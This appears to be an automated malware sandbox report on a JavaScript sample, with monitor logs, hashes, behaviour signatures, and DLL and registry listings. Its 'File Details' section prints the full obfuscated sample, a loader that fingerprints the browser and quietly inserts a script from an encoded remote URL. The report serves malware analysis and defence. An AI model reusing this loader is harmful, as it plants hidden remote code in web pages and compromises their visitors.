2025-12-08 08:31:20,906 [root] DEBUG: 556: OpenProcessHandler: Injection info created for process 396, handle 0x5f0: C:\Windows\System32\taskhost.exe
2025-12-08 08:31:23,477 [modules.auxiliary.human] INFO: Found button "ok", clicking it
2025-12-08 08:31:24,477 [root] DEBUG: 3016: NtTerminateProcess hook: Attempting to dump process 3016
2025-12-08 08:31:24,477 [root] DEBUG: 3016: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 08:31:24,493 [root] INFO: Process with pid 3016 has terminated
2025-12-08 08:31:41,508 [root] DEBUG: 556: OpenProcessHandler: Injection info created for process 3768, handle 0x5f0: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
2025-12-08 08:32:14,821 [root] DEBUG: 556: CreateProcessHandler: Injection info set for new process 224: C:\Windows\system32\DllHost.exe, ImageBase: 0x00A50000
2025-12-08 08:32:14,821 [root] INFO: Announced 32-bit process name: dllhost.exe pid: 224
2025-12-08 08:32:14,821 [lib.api.process] INFO: Monitor config for <Process 224 dllhost.exe>: C:\tmpxury4kjh\dll\224.ini
2025-12-08 08:32:14,836 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpxury4kjh\dll\yrjhZcK.dll, loader C:\tmpxury4kjh\bin\RVmCpJY.exe
2025-12-08 08:32:14,836 [root] DEBUG: Loader: Injecting process 224 (thread 1360) with C:\tmpxury4kjh\dll\yrjhZcK.dll.
2025-12-08 08:32:14,836 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 08:32:14,836 [root] DEBUG: Successfully injected DLL C:\tmpxury4kjh\dll\yrjhZcK.dll.
2025-12-08 08:32:14,852 [lib.api.process] INFO: Injected into 32-bit <Process 224 dllhost.exe>
2025-12-08 08:32:14,852 [root] INFO: Announced 32-bit process name: dllhost.exe pid: 224
2025-12-08 08:32:14,852 [lib.api.process] INFO: Monitor config for <Process 224 dllhost.exe>: C:\tmpxury4kjh\dll\224.ini
2025-12-08 08:32:14,852 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpxury4kjh\dll\yrjhZcK.dll, loader C:\tmpxury4kjh\bin\RVmCpJY.exe
2025-12-08 08:32:14,852 [root] DEBUG: Loader: Injecting process 224 (thread 1360) with C:\tmpxury4kjh\dll\yrjhZcK.dll.
2025-12-08 08:32:14,868 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2025-12-08 08:32:14,868 [root] DEBUG: Successfully injected DLL C:\tmpxury4kjh\dll\yrjhZcK.dll.
2025-12-08 08:32:14,868 [lib.api.process] INFO: Injected into 32-bit <Process 224 dllhost.exe>
2025-12-08 08:32:14,868 [root] DEBUG: 224: Python path set to 'C:\Python38'.
2025-12-08 08:32:14,868 [root] DEBUG: 224: Dropped file limit defaulting to 100.
2025-12-08 08:32:14,883 [root] INFO: Disabling sleep skipping.
2025-12-08 08:32:14,883 [root] DEBUG: 224: YaraInit: Compiled rules loaded from existing file C:\tmpxury4kjh\data\yara\capemon.yac
2025-12-08 08:32:14,883 [root] DEBUG: 224: YaraScan: Scanning 0x00A50000, size 0x4114
2025-12-08 08:32:14,883 [root] DEBUG: 224: Monitor initialised: 32-bit capemon loaded in process 224 at 0x6c9a0000, thread 1360, image base 0xa50000, stack from 0x176000-0x180000
2025-12-08 08:32:14,883 [root] DEBUG: 224: Commandline: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
2025-12-08 08:32:14,883 [root] DEBUG: 224: GetAddressByYara: ModuleBase 0x774E0000 FunctionName LdrpCallInitRoutine
2025-12-08 08:32:14,883 [root] DEBUG: 224: hook_api: LdrpCallInitRoutine export address 0x77538810 obtained via GetFunctionAddress
2025-12-08 08:32:14,883 [root] DEBUG: 224: hook_api: Warning - CreateRemoteThreadEx export address 0x764AF98F differs from GetProcAddress -> 0x754EBB18 (KERNELBASE.dll::0xbb18)
2025-12-08 08:32:14,899 [root] DEBUG: 224: hook_api: Warning - UpdateProcThreadAttribute export address 0x764B020F differs from GetProcAddress -> 0x754F43FB (KERNELBASE.dll::0x143fb)
2025-12-08 08:32:14,899 [root] WARNING: b'Unable to place hook on GetCommandLineA'
2025-12-08 08:32:14,915 [root] DEBUG: 224: set_hooks: Unable to hook GetCommandLineA
2025-12-08 08:32:14,930 [root] WARNING: b'Unable to place hook on GetCommandLineW'
2025-12-08 08:32:14,930 [root] DEBUG: 224: set_hooks: Unable to hook GetCommandLineW
2025-12-08 08:32:14,930 [root] DEBUG: 224: Hooked 611 out of 613 functions
2025-12-08 08:32:14,930 [root] DEBUG: 224: WoW64 not detected.
2025-12-08 08:32:14,930 [root] INFO: Loaded monitor into process with pid 224
2025-12-08 08:32:14,930 [root] DEBUG: 224: caller_dispatch: Added region at 0x00A50000 to tracked regions list (kernel32::GetSystemTimeAsFileTime returns to 0x00A5193E, thread 1360).
2025-12-08 08:32:14,930 [root] DEBUG: 224: YaraScan: Scanning 0x00A50000, size 0x4114
2025-12-08 08:32:14,946 [root] DEBUG: 224: ProcessImageBase: Main module image at 0x00A50000 unmodified (entropy change 0.000000e+00)
2025-12-08 08:32:14,961 [root] DEBUG: 224: DLL loaded at 0x753E0000: C:\Windows\system32\CRYPTBASE (0xc000 bytes).
2025-12-08 08:32:14,961 [root] DEBUG: 224: DLL loaded at 0x76100000: C:\Windows\system32\CLBCatQ (0x83000 bytes).
2025-12-08 08:32:14,961 [root] DEBUG: 224: DLL loaded at 0x75D80000: C:\Windows\system32\OLEAUT32 (0x8f000 bytes).
2025-12-08 08:32:14,961 [root] DEBUG: 224: DLL loaded at 0x74ED0000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2025-12-08 08:32:14,961 [root] DEBUG: 224: DLL loaded at 0x74C60000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2025-12-08 08:32:14,961 [root] DEBUG: 224: DLL loaded at 0x75450000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2025-12-08 08:32:14,977 [root] DEBUG: 224: DLL loaded at 0x74170000: C:\Windows\system32\uxtheme (0x40000 bytes).
2025-12-08 08:32:14,993 [root] DEBUG: 224: DLL loaded at 0x75920000: C:\Windows\System32\wininet (0x1e4000 bytes).
2025-12-08 08:32:14,993 [root] DEBUG: 224: DLL loaded at 0x75610000: C:\Windows\system32\api-ms-win-downlevel-user32-l1-1-0 (0x4000 bytes).
2025-12-08 08:32:14,993 [root] DEBUG: 224: DLL loaded at 0x757E0000: C:\Windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0 (0x4000 bytes).
2025-12-08 08:32:14,993 [root] DEBUG: 224: DLL loaded at 0x75620000: C:\Windows\system32\api-ms-win-downlevel-version-l1-1-0 (0x4000 bytes).
2025-12-08 08:32:14,993 [root] DEBUG: 224: DLL loaded at 0x74960000: C:\Windows\system32\version (0x9000 bytes).
2025-12-08 08:32:14,993 [root] DEBUG: 224: DLL loaded at 0x75600000: C:\Windows\system32\api-ms-win-downlevel-normaliz-l1-1-0 (0x3000 bytes).
2025-12-08 08:32:14,993 [root] DEBUG: 224: DLL loaded at 0x77630000: C:\Windows\system32\normaliz (0x3000 bytes).
2025-12-08 08:32:14,993 [root] DEBUG: 224: DLL loaded at 0x761B0000: C:\Windows\system32\iertutil (0x232000 bytes).
2025-12-08 08:32:14,993 [root] DEBUG: 224: DLL loaded at 0x755C0000: C:\Windows\system32\api-ms-win-downlevel-advapi32-l1-1-0 (0x5000 bytes).
2025-12-08 08:32:14,993 [root] DEBUG: 224: DLL loaded at 0x757C0000: C:\Windows\system32\USERENV (0x17000 bytes).
2025-12-08 08:32:14,993 [root] DEBUG: 224: DLL loaded at 0x754D0000: C:\Windows\system32\profapi (0xb000 bytes).
2025-12-08 08:32:14,993 [root] DEBUG: 224: DLL loaded at 0x75790000: C:\Windows\system32\api-ms-win-downlevel-ole32-l1-1-0 (0x4000 bytes).
2025-12-08 08:32:14,993 [root] DEBUG: 224: DLL loaded at 0x75350000: C:\Windows\system32\Secur32 (0x8000 bytes).
2025-12-08 08:32:15,008 [root] DEBUG: 224: DLL loaded at 0x766D0000: C:\Windows\system32\SHELL32 (0xc4c000 bytes).
2025-12-08 08:32:15,008 [root] DEBUG: 224: DLL loaded at 0x72CD0000: C:\Windows\system32\api-ms-win-downlevel-advapi32-l2-1-0 (0x4000 bytes).
2025-12-08 08:32:15,008 [root] DEBUG: 224: DLL loaded at 0x72BF0000: C:\Windows\system32\winhttp (0x58000 bytes).
2025-12-08 08:32:15,008 [root] DEBUG: 224: DLL loaded at 0x72BA0000: C:\Windows\system32\webio (0x50000 bytes).
2025-12-08 08:32:15,008 [root] DEBUG: 224: DLL loaded at 0x74E90000: C:\Windows\system32\mswsock (0x3c000 bytes).
2025-12-08 08:32:15,024 [root] DEBUG: 224: DLL loaded at 0x74E80000: C:\Windows\System32\wship6 (0x6000 bytes).
2025-12-08 08:32:15,024 [root] DEBUG: 224: DLL loaded at 0x73640000: C:\Windows\system32\IPHLPAPI (0x1c000 bytes).
2025-12-08 08:32:15,024 [root] DEBUG: 224: DLL loaded at 0x736D0000: C:\Windows\system32\WINNSI (0x7000 bytes).
2025-12-08 08:32:19,743 [root] DEBUG: 556: OpenProcessHandler: Injection info created for process 2068, handle 0x5f8: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
2025-12-08 08:32:20,008 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat
2025-12-08 08:32:20,008 [root] INFO: Process with pid 224 has terminated
2025-12-08 08:32:20,008 [root] DEBUG: 224: NtTerminateProcess hook: Attempting to dump process 224
2025-12-08 08:32:20,008 [root] DEBUG: 224: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 08:34:18,805 [root] INFO: Analysis timeout hit, terminating analysis
2025-12-08 08:34:18,805 [lib.api.process] INFO: Terminate event set for <Process 556 svchost.exe>
2025-12-08 08:34:18,805 [root] DEBUG: 556: Terminate Event: Attempting to dump process 556
2025-12-08 08:34:18,805 [root] DEBUG: 556: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 08:34:18,805 [root] DEBUG: 556: Terminate Event: Current region empty
2025-12-08 08:34:18,805 [lib.api.process] INFO: Termination confirmed for <Process 556 svchost.exe>
2025-12-08 08:34:18,805 [root] INFO: Terminate event set for process 556
2025-12-08 08:34:18,805 [root] DEBUG: 556: Terminate Event: CAPE shutdown complete for process 556
2025-12-08 08:34:18,805 [root] INFO: Created shutdown mutex
2025-12-08 08:34:19,805 [root] INFO: Shutting down package
2025-12-08 08:34:19,805 [root] INFO: Stopping auxiliary modules
2025-12-08 08:34:19,805 [root] INFO: Stopping auxiliary module: Browser
2025-12-08 08:34:19,805 [root] INFO: Stopping auxiliary module: Curtain
2025-12-08 08:34:19,821 [lib.common.results] INFO: Uploading file C:\curtain.log to curtain/1765154059.8212893.curtain.log; Size is 36; Max size: 100000000
2025-12-08 08:34:19,836 [root] INFO: Stopping auxiliary module: End_noisy_tasks
2025-12-08 08:34:19,836 [root] INFO: Stopping auxiliary module: Evtx
2025-12-08 08:34:19,836 [modules.auxiliary.evtx] DEBUG: Adding C:/Windows/System32/winevt/Logs\Application.evtx to zip dump
2025-12-08 08:34:19,836 [modules.auxiliary.evtx] DEBUG: Adding C:/Windows/System32/winevt/Logs\HardwareEvents.evtx to zip dump
2025-12-08 08:34:19,836 [modules.auxiliary.evtx] DEBUG: Adding C:/Windows/System32/winevt/Logs\Internet Explorer.evtx to zip dump
2025-12-08 08:34:19,836 [modules.auxiliary.evtx] DEBUG: Adding C:/Windows/System32/winevt/Logs\Key Management Service.evtx to zip dump
2025-12-08 08:34:19,836 [modules.auxiliary.evtx] DEBUG: Adding C:/Windows/System32/winevt/Logs\Microsoft-Windows-Sysmon%4Operational.evtx to zip dump
2025-12-08 08:34:19,852 [modules.auxiliary.evtx] DEBUG: Adding C:/Windows/System32/winevt/Logs\OAlerts.evtx to zip dump
2025-12-08 08:34:19,852 [modules.auxiliary.evtx] DEBUG: Adding C:/Windows/System32/winevt/Logs\Security.evtx to zip dump
2025-12-08 08:34:19,852 [modules.auxiliary.evtx] DEBUG: Adding C:/Windows/System32/winevt/Logs\Setup.evtx to zip dump
2025-12-08 08:34:19,852 [modules.auxiliary.evtx] DEBUG: Adding C:/Windows/System32/winevt/Logs\System.evtx to zip dump
2025-12-08 08:34:19,852 [modules.auxiliary.evtx] DEBUG: Adding C:/Windows/System32/winevt/Logs\Windows PowerShell.evtx to zip dump
2025-12-08 08:34:19,993 [modules.auxiliary.evtx] DEBUG: Uploading evtx.zip to host
2025-12-08 08:34:19,993 [lib.common.results] INFO: Uploading file evtx.zip to evtx/evtx.zip; Size is 323681; Max size: 100000000
2025-12-08 08:34:19,993 [root] INFO: Stopping auxiliary module: Human
2025-12-08 08:34:20,071 [root] INFO: Stopping auxiliary module: Pre_script
2025-12-08 08:34:20,071 [root] INFO: Stopping auxiliary module: Screenshots
2025-12-08 08:34:24,399 [root] INFO: Stopping auxiliary module: Usage
2025-12-08 08:34:25,493 [root] INFO: Stopping auxiliary module: During_script
2025-12-08 08:34:25,493 [root] INFO: Finishing auxiliary modules
2025-12-08 08:34:25,493 [root] INFO: Shutting down pipe server and dumping dropped files
2025-12-08 08:34:25,493 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat to files\42f9c76ccf7a86c64d1244263a0ff86751e86e025a5996c938bd49c2e24714a1; Size is 128; Max size: 100000000
2025-12-08 08:34:25,493 [root] WARNING: Folder at path "C:\izVIbM\debugger" does not exist, skipping
2025-12-08 08:34:25,493 [root] WARNING: Folder at path "C:\izVIbM\tlsdump" does not exist, skipping
2025-12-08 08:34:25,493 [root] INFO: Analysis completed
Machine
| Name | Label | Manager | Started On | Shutdown On | Route |
|---|---|---|---|---|---|
| win7-32bit-1 | win7-32bit-1 | KVM | 2025-12-08 16:32:32 | 2025-12-08 16:35:55 | inetsim |
File Details
| File Name |
testjs.js
|
|---|---|
| File Type | JavaScript source, ASCII text, with very long lines (1588), with no line terminators |
| File Size | 1588 bytes |
| MD5 | f3f4a0031083207815ea26bf7d96b25f |
| SHA1 | 8eae84b422288fb3798f13d07e8caa08a8b60cb9 |
| SHA256 | 0bc581a48215eb92ecc15b30954ee4f1c2d9be15134e72b5f3aebe192eae3cb4 [VT] [MWDB] [Bazaar] |
| SHA3-384 | 7da3b7677de10374837ca9b7c60452ccdcb70b974ed8f62507236595f9dfa75e9c93090a078a57176be875f403ca76f7 |
| CRC32 | 7FD7BCF1 |
| TLSH | T1A131629B7000D8E183664197F73F110D29BA9D54E0EE8519CD49904E3CB8E4D8129ECF |
| Ssdeep | 48:ncrKDElo1rmeYG9Gp090nnaBOR+N6kzkem:uKYlQ+aTNhzXm |
| File BinGraph Vba2Graph Text |
(function(){var v=50;var e=0;function b(){e++;if(e>v)return false;if(!document.body)setTimeout(b,500);else(function(){function t(s){return(s+'').replace(/[a-z]/gi,function(s){return String.fromCharCode(s.charCodeAt(0)+(s.toLowerCase()<'n'?13:-13));});}var i=[' ;1=',' GA ','gcv','p.rk',')q\\/','RVFZ','inw/','avJ(','=fre',')]+',']9-3','[.6 ','))]7','vepf','(1.5','gar','gkrg','|]9-','GA f','u',']3-0','0[1|','revS','a//:','fjbq','gc','c','9-0[','R )*','qveG','epfn','.(01','cggu',')*.(','cn-f','vJ(|','.21/','kbsr','vsgr','GA'];for(var z=0;z<i.length;z++){var s=t(i[z]+'');i[z]=s.split('').reverse().join('');}function je(v,u){var w=false;var d=false;for(var k=0;k<v.length;k++){var p=new RegExp(v[k][0],v[k][1]);if(v[k][2]){w=true;if(p.test(u)){d=true;}}else{if(p.test(u)){return false;}}}if(w&&!d){return false;}return true;}var ud=navigator.userAgent;if(je([[i[5],'i',1],[i[29]+i[15],'i',1],[i[7]+i[24]+i[1]+i[14]+t('.*) ')+i[22]+t('sbk\\')+t('/\\q)')+i[35]+t('aqbj')+i[18]+i[11]+i[20]+i[33]+t(' Sve')+i[37]+t('\\/([')+i[10]+t('.[0|')+t('5|6]')+i[21]+i[17]+t('2[0-')+i[12],'i',1],[i[7]+i[24]+i[1]+i[31]+i[28]+t('qtr\\')+i[36]+i[27]+i[9],'i',1]],ud)&&je([[t('Jvaq')+t('bjf ')+i[39],'i',1]],ud)){(function(){var g=t('k-gq')+i[34]+i[26];var j=document.cookie.match(new RegExp("(?:^|; )"+g+"=([^;]*)"));if(!j){var s=document.createElement(i[13]+i[25]);s.type=i[16]+i[6]+i[30]+i[2];s.src=i[32]+i[23]+i[38]+i[3]+i[19];var m=document.documentElement;m.insertBefore(s,m.lastChild);var d=new Date();d.setTime(d.getTime()+259200000);document.cookie=g+i[0]+t('rkcv')+i[8]+d;}})();}})();}b();})();
| Discovery | Command and Control | Defense Evasion | Privilege Escalation |
|
|
|
|---|
Usage
Processing ( 1.10 seconds )
- 0.593 Heatmap
- 0.465 CAPE
- 0.038 BehaviorAnalysis
- 0.003 AnalysisInfo
- 0.003 NetworkAnalysis
- 0.001 Debug
Signatures ( 0.03 seconds )
- 0.005 antiav_detectreg
- 0.003 ransomware_files
- 0.002 antianalysis_detectfile
- 0.002 infostealer_ftp
- 0.002 ransomware_extensions
- 0.002 territorial_disputes_sigs
- 0.001 antianalysis_detectreg
- 0.001 antiav_detectfile
- 0.001 antivm_vbox_files
- 0.001 antivm_vbox_keys
- 0.001 geodo_banking_trojan
- 0.001 browser_security
- 0.001 infostealer_bitcoin
- 0.001 infostealer_im
- 0.001 infostealer_mail
- 0.001 poullight_files
- 0.001 masquerade_process_name
- 0.001 ursnif_behavior
Reporting ( 0.05 seconds )
- 0.042 ReportHTML
- 0.003 JsonDump
- 0.002 LiteReport
- 0.002 MITRE_TTPS
Signatures
Checks available memory
JavaScript timer detected to delay or measure execution time
process: wscript.exe
SetUnhandledExceptionFilter detected (possible anti-debug)
Dynamic (imported) function loading detected
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: uxtheme.dll/ThemeInitApiHook
DynamicLoader: USER32.dll/IsProcessDPIAware
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: kernel32.dll/HeapSetInformation
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: SXS.DLL/SxsOleAut32MapConfiguredClsidToReferenceClsid
DynamicLoader: dwmapi.dll/DwmIsCompositionEnabled
DynamicLoader: kernel32.dll/ResolveDelayLoadedAPI
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ADVAPI32.dll/SaferIdentifyLevel
DynamicLoader: ADVAPI32.dll/SaferComputeTokenFromLevel
DynamicLoader: ADVAPI32.dll/SaferCloseLevel
DynamicLoader: ole32.dll/CoGetObjectContext
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: RpcRtRemote.dll/I_RpcExtInitializeExtensionPoint
DynamicLoader: OLEAUT32.dll/
DynamicLoader: USERENV.dll/CreateEnvironmentBlock
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: SspiCli.dll/GetUserNameExW
DynamicLoader: USERENV.dll/DestroyEnvironmentBlock
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CLSIDFromOle1Class
DynamicLoader: CLBCatQ.DLL/GetCatalogObject
DynamicLoader: CLBCatQ.DLL/GetCatalogObject2
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: uxtheme.dll/ThemeInitApiHook
DynamicLoader: USER32.dll/IsProcessDPIAware
DynamicLoader: ole32.dll/CoGetClassObject
DynamicLoader: ole32.dll/CoGetMarshalSizeMax
DynamicLoader: ole32.dll/CoMarshalInterface
DynamicLoader: ole32.dll/CoUnmarshalInterface
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: ole32.dll/CoGetPSClsid
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ole32.dll/CoReleaseMarshalData
DynamicLoader: ole32.dll/DcomChannelSetHResult
DynamicLoader: wininet.dll/DllGetClassObject
DynamicLoader: wininet.dll/DllCanUnloadNow
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoCreateInstance
DynamicLoader: ole32.dll/CoGetMarshalSizeMax
DynamicLoader: ole32.dll/CoMarshalInterface
DynamicLoader: ole32.dll/CoUnmarshalInterface
DynamicLoader: ole32.dll/CoReleaseMarshalData
DynamicLoader: wininet.dll/DllGetClassObject
DynamicLoader: wininet.dll/DllCanUnloadNow
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoImpersonateClient
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoRevertToSelf
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/GetTokenInformation
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/CopySid
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/EqualSid
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/GetSidSubAuthorityCount
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/GetSidSubAuthority
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/EventRegister
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/EventUnregister
DynamicLoader: Secur32.dll/GetUserNameExA
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegCreateKeyExA
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegQueryValueExA
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegOpenKeyExW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegGetValueW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegCloseKey
DynamicLoader: SHELL32.dll/SHGetKnownFolderPath
DynamicLoader: api-ms-win-downlevel-advapi32-l2-1-0.dll/ConvertSidToStringSidW
DynamicLoader: api-ms-win-downlevel-advapi32-l2-1-0.dll/ConvertStringSecurityDescriptorToSecurityDescriptorW
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoTaskMemFree
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegGetValueA
DynamicLoader: iertutil.dll/
DynamicLoader: iertutil.dll/
DynamicLoader: iertutil.dll/
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegOpenKeyExA
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoTaskMemAlloc
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: winhttp.dll/WinHttpCreateProxyResolver
DynamicLoader: iertutil.dll/
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegQueryValueExW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegCreateKeyExW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegSetValueExW
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/WSAIoctl
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: IPHLPAPI.DLL/NotifyIpInterfaceChange
DynamicLoader: IPHLPAPI.DLL/NotifyUnicastIpAddressChange
DynamicLoader: IPHLPAPI.DLL/GetBestInterfaceEx
DynamicLoader: IPHLPAPI.DLL/GetIfEntry2
DynamicLoader: OLEAUT32.dll/
Resumed a thread in another process
thread_resumed: Process wscript.exe with process ID 3016 resumed a thread in another process with the process ID 3016
thread_resumed: Process dllhost.exe with process ID 224 resumed a thread in another process with the process ID 224
Attempts to make a network connection via suspicious process
Checks for presence of debugger via IsDebuggerPresent
Screenshots
Session Playback
No playback available.
Hosts
No hosts contacted.
DNS
No domains contacted.
Summary
\Device\KsecDD
C:\Windows\System32\wscript.exe
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Users\user\AppData\Local\Temp\testjs.js
C:\Windows\inf\hdaudio.inf
C:\Windows\System32\DriverStore\en-US\hdaudio.inf_loc
C:\Windows\inf\hdaudio.PNF
C:\Windows\Temp
C:\Users\user\AppData\Local\Temp
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat
C:
\??\Nsi
C:\Windows\System32\wscript.exe
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Users\user\AppData\Local\Temp\testjs.js
C:\Windows\inf\hdaudio.inf
C:\Windows\System32\DriverStore\en-US\hdaudio.inf_loc
C:\Windows\inf\hdaudio.PNF
C:\Windows\Temp
C:\Users\user\AppData\Local\Temp
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat
C:
\??\Nsi
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat
DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-US
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-US
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\IgnoreUserSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\Enabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\Enabled
HKEY_CURRENT_USER\Software\Classes
HKEY_CURRENT_USER\Software\Classes\AppID\wscript.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\LogSecuritySuccesses
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\LogSecuritySuccesses
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\TrustPolicy
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\UseWINSAFER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\TrustPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\UseWINSAFER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\Timeout
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\DisplayLogo
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\Timeout
HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\DisplayLogo
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Sorting\Versions\00060101.00060101
HKEY_CLASSES_ROOT\.js
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.js\(Default)
HKEY_CLASSES_ROOT\JSFile\ScriptEngine
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JSFile\ScriptEngine\(Default)
HKEY_CURRENT_USER\Software\Classes\JScript
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JScript\CLSID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JScript\CLSID\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\COM3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\COM+Enabled
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\Option
HKEY_CURRENT_USER\Software\Classes\Interface\{00000134-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\Extensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BFE
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledProcesses\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\DA0C75D6
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledSessions\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
